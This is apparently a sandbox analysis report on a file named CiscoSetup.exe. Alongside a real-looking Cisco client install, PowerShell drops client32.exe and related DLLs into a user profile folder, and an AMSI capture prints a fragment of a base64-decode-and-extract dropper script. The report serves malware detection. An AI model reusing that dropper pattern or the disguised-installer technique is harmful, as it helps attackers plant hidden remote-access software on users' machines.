                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: samcli.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: dbghelp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: dbgcore.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wtsapi32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: nsmtrace.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: nslsp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: devobj.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msasn1.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcihooks.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: textshaping.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: winsta.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: riched32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: riched20.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: usp10.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msls31.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pciinv.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: firewallapi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: fwbase.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: napinsp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pnrpnsp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wshbth.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: nlaapi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: winrnr.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: fwpolicyiomgr.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: dhcpcsvc6.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: dhcpcsvc.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcicl32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: shfolder.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcichek.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcicapi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: version.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wsock32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: netapi32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msvcr100.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msvcr100.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: samcli.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wtsapi32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: nsmtrace.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: nslsp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: devobj.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msasn1.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcicl32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: shfolder.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcichek.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcicapi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: version.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wsock32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msvcr100.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msvcr100.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: netapi32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: samcli.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wtsapi32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: nsmtrace.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: nslsp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: devobj.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msasn1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                  Source: Cisco Secure Client for Windows.lnk.2.dr LNK file: ..\..\..\..\..\..\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\Cisco\nsm_vpro.ini
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Window found: window name: TSelectLanguageForm
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: OK
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: Install
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
                                  Source: Window Recorder Window detected: More than 3 window changes detected
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                  Source: CiscoSetup.exe Static PE information: certificate valid
                                  Source: CiscoSetup.exe Static file information: File size 16883280 > 1048576
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dll
                                  Source: CiscoSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000006.00000002.4600795851.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000009.00000002.2498300418.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2580406925.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, PCICHEK.DLL.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\ApiShim\Win32\Release\vpnapishim.pdb source: is-V8S0O.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\WebHelper\Plugin\Win32\Release\acwebhelper.pdb&&&GCTL source: is-S9VDU.tmp.2.dr
                                  Source: Binary string: ws\Mion.pdb source: powershell.exe, 00000004.00000002.2458265497.000000000756A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\Win32\Release\InstallHelper.pdb source: is-H5812.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\ApiShim\Win32\Release\vpnapishim.pdb...GCTL source: is-V8S0O.tmp.2.dr
                                  Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdb source: is-OJMRD.tmp.2.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Phoenix\third-party\libcurl\out.win.7.x86\curl-7.84.0\builds\libcurl-vc-x86-release-dll-ssl-dll-ipv6-sspi-obj-lib\accurl.pdb source: is-2J155.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\WebHelper\Plugin\Win32\Release\acwebhelper.pdb source: is-S9VDU.tmp.2.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdb source: is-VTDA9.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\PhoneHome\Win32\Release\acfeedback.pdb source: is-2TJID.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\proj_Phoenix_VS20190.730599493905\proj_Phoenix_VS2019\vpn\VA\NDIS6\x64\Release\vpnva64-6.pdbGCTL source: is-EUMLH.tmp.2.dr
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.4600362190.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2498047838.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2580034650.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2409667962.0000000003148000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\proj_Phoenix_VS20190.730599493905\proj_Phoenix_VS2019\vpn\VA\NDIS6\x64\Release\vpnva64-6.pdb source: is-EUMLH.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\x64\Release\InstallHelper64.pdb source: is-KLEUG.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\x64\Release\InstallHelper64.pdb; source: is-KLEUG.tmp.2.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdbAAA source: is-VTDA9.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\PhoneHome\Win32\Release\acfeedback.pdbMM/GCTL source: is-2TJID.tmp.2.dr
                                  Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdbGCTL source: is-OJMRD.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000006.00000002.4600671174.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000009.00000002.2498203499.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2580255021.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp

                                  Data Obfuscation

                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content);[System.IO.File]::WriteAllBytes($zipFileName, $decodedBytes);New-Item -ItemType Directory -Path $destinationPath;Expand-Archive -Path $zipFileName -DestinationPath $de
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 6_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029230
                                  Source: CiscoSetup.exe Static PE information: section name: .didata
                                  Source: CiscoSetup.tmp.0.dr Static PE information: section name: .didata
                                  Source: is-VTFF8.tmp.2.dr Static PE information: section name: .didata
                                  Source: is-3NCDE.tmp.2.dr Static PE information: section name: fipstx
                                  Source: is-3NCDE.tmp.2.dr Static PE information: section name: fipsro
                                  Source: is-3NCDE.tmp.2.dr Static PE information: section name: fipsda
                                  Source: is-3NCDE.tmp.2.dr Static PE information: section name: fsig
                                  Source: is-3NCDE.tmp.2.dr Static PE information: section name: fipsrd
                                  Source: is-KLEUG.tmp.2.dr Static PE information: section name: _RDATA
                                  Source: is-8761D.tmp.2.dr Static PE information: section name: _RDATA
                                  Source: is-7ITNQ.tmp.2.dr Static PE information: section name: .orpc
                                  Source: is-S996S.tmp.2.dr Static PE information: section name: .00cfg
                                  Source: is-S996S.tmp.2.dr Static PE information: section name: .voltbl
                                  Source: PCICL32.DLL.4.dr Static PE information: section name: .hhshare
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04A1C492 pushad ; ret 4_2_04A1C493
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07689740 pushad ; ret 4_2_07689A25
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_076892D9 push FFFFFFE8h; iretd 4_2_076892DD
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_088268EE push FFFFFFE9h; ret 4_2_088268F0
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08820F82 push esp; ret 4_2_08820F83
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1116B825 push ecx; ret 6_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11166719 push ecx; ret 6_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68926BBF push ecx; ret 6_2_68926BD2
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68924DF5 push 689243F9h; retf 6_2_68924E1F
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689194C5 push ecx; ret 6_2_689194D8
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1116B825 push ecx; ret 9_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1104E56B push ecx; retf 0007h9_2_1104E56C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11166719 push ecx; ret 9_2_1116672C
                                  Source: is-53P9C.tmp.2.drStatic PE information: section name: .text entropy: 6.8383653762559575
                                  Source: msvcr100.dll.4.drStatic PE information: section name: .text entropy: 6.909044922675825
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-0CFDM.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-96AL6.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-I704D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-N98KR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KHO2L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-91CSN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-98QQL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EUMLH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8761D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-7ITNQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-O18K3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-970AL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-RN0PK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3JN2R.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T4BIJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-Q7F68.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KLEUG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-P9NEN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-URJD8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\is-VTFF8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)Jump to dropped file
